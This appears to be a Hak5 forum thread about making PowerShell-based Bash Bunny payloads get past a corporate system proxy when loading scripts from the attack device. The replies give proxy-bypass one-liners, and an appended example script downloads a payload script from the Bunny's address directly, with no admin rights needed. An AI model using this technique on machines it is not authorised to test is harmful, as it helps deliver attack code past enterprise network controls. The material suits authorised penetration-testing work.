Hak5 Forums
cyb3rwr3ck

Dealing with powershell and proxies in payloads

Hi there,

I was wondering how the PowerShell based Bunny payloads that load PowerShell script files from either the SMB share or the web service of the Bunny could circumvent the system-wide proxy. The problem is that the proxy - obviously - is unable to connect to the Bunny IP and the payload fails. The current versions of the payloads do not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the Bunny and to use it in all other requests, which is the PowerShell default.

I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin.

Any ideas?

Best regards!

F


Have not tried doing network stuff with the bunny with a proxy setting in play.  By default doesn't the proxy only get used for stuff leaving the local network or am I missing something and there is a way to make a machine use the proxy for every kind of network traffic, including local?

If it is the first, I don't think the proxy setting will get in the way of the bunny since the interface for it will come up as a local network (NIC and remote device "Bunny" are on the same subnet).

 

Anyone else wanna correct?  This is all speculation here.

17 hours ago, PoSHMagiC0de said:

By default doesn't the proxy only get used for stuff leaving the local network or am I missing something and there is a way to make a machine use the proxy for every kind of network traffic, including local?

The thing is that the Bunny presents a network to the host during this kind of "bring your own network" attack. So the proxy is utilized as long as there is no "direct" exception for exactly this Bunny network configuration. This will create a CONNECT request to the explicit proxy which dies...

The only thing that should fix this behavior is enforcing this kind of direct request, which - in an enterprise setup - is usually done by PAC files. I have no idea how to do it temporarily using PowerShell, so this is the goal to achieve.


Yeah, that is a tough one.  I do not have a setup to test that but I know PowerShell has a method to bypass the proxy.

Try these 2 ways.  Both are PowerShell.

#If you use Invoke-WebRequest (PowerShell 6+; the -NoProxy switch does not exist in Windows PowerShell 5.1)
Invoke-WebRequest -Uri "Bashbunny uri" -NoProxy

#If using old school WebClient. Use before making the request.
#GlobalProxySelection is marked obsolete; its Select setter sets the process-wide
#WebRequest.DefaultWebProxy, so every later request in this PowerShell process also goes direct.
[System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()

 

Do not know if these will work but worth a try.

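As an added example (not code from this thread or from the Bash Bunny payloads themselves), the script below ties the two goals of the thread together for the HTTP case: first it checks whether the user's current proxy configuration (WinINET settings or PAC) would route the Bunny's address through the proxy, then it fetches the payload script with the proxy disabled for that single request only, so later requests in the same process still use the system proxy as PowerShell does by default. The IP 172.16.64.1 and the path /payload.ps1 are assumed placeholders; nothing here needs local admin, because the machine and user proxy settings are never modified.

```powershell
# Added example, not from the thread. Assumptions: the Bunny answers on
# 172.16.64.1 and serves the script at /payload.ps1 (both placeholders).
$BunnyUri = [uri]'http://172.16.64.1/payload.ps1'

function Test-ProxyRoute {
    # Reports whether the current user's proxy configuration would send a
    # request for $Uri through a proxy. IWebProxy.GetProxy() returns the
    # destination itself when the address is bypassed or no proxy applies,
    # and the proxy's own URI otherwise.
    param([Parameter(Mandatory)][uri]$Uri)
    $sys   = [System.Net.WebRequest]::GetSystemWebProxy()
    $route = $sys.GetProxy($Uri)
    $via   = ($route.AbsoluteUri -ne $Uri.AbsoluteUri)
    $proxyUsed = $null
    if ($via) { $proxyUsed = $route }
    [pscustomobject]@{
        Uri       = $Uri
        ViaProxy  = $via
        ProxyUsed = $proxyUsed
    }
}

function Get-DirectContent {
    # Downloads $Uri with the proxy disabled for this request only.
    # No admin rights and no change to the user or machine proxy settings:
    # the null proxy applies to this WebClient instance alone, so a later
    # Invoke-WebRequest in the same process still goes through the system
    # proxy, which is the behaviour the payload wants for everything else.
    param([Parameter(Mandatory)][uri]$Uri)
    if ($PSVersionTable.PSVersion.Major -ge 6) {
        # PowerShell 6+ has a per-request -NoProxy switch.
        return (Invoke-WebRequest -Uri $Uri -NoProxy).Content
    }
    # Windows PowerShell 5.1 has no -NoProxy; an explicit $null proxy on the
    # WebClient means "no proxy", as opposed to "use the default proxy".
    $wc = New-Object System.Net.WebClient
    $wc.Proxy = $null
    try {
        return $wc.DownloadString($Uri)
    } finally {
        $wc.Dispose()
    }
}

# Show how the current configuration would route the Bunny address.
Test-ProxyRoute -Uri $BunnyUri | Format-List

# Fetch the script directly; hand $script to the payload from here.
$script = Get-DirectContent -Uri $BunnyUri
"Fetched {0} characters from {1}" -f $script.Length, $BunnyUri
```

If Test-ProxyRoute reports ViaProxy = True for the Bunny address, that is exactly the case the thread describes: the explicit proxy receives the request and cannot reach the Bunny. Get-DirectContent sidesteps it without touching WebRequest.DefaultWebProxy, which is the difference from the GlobalProxySelection approach above: that one redirects every subsequent request in the process, this one only the download from the Bunny.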
